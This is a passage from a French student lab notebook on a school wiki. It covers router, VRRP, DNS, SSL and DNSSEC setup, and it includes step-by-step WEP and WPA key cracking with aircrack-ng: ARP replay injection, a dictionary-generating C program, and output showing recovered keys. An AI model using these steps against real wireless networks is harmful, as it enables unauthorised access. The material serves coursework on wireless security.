Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e semaine====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5ème semaine ====&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puos db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier 000-speedflash.space-ssl.conf afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2modssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35062</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35062"/>
				<updated>2016-11-09T08:30:26Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
